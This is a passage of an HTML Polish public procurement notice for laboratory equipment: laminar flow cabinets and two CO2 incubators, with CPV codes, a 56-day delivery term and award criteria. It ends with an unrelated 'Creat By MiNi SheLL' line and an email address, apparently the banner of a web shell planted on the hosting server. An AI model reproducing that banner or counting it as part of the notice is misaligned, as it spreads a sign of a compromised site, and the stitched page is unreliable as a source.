2.	Oferowane przez Wykonawcę urządzenia muszą spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 9 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.40-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ocena techniczna - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - Inkubator Co2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zadanie obejmuje dostawę i montaż inkubatora Co2 - 2 sztuki, w konfiguracji określonej w załączniku nr 10 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.	Oferowane przez Wykonawcę urządzenia muszą spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 10 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
	33152000-0 - Inkubatory.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ocena techniczna - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com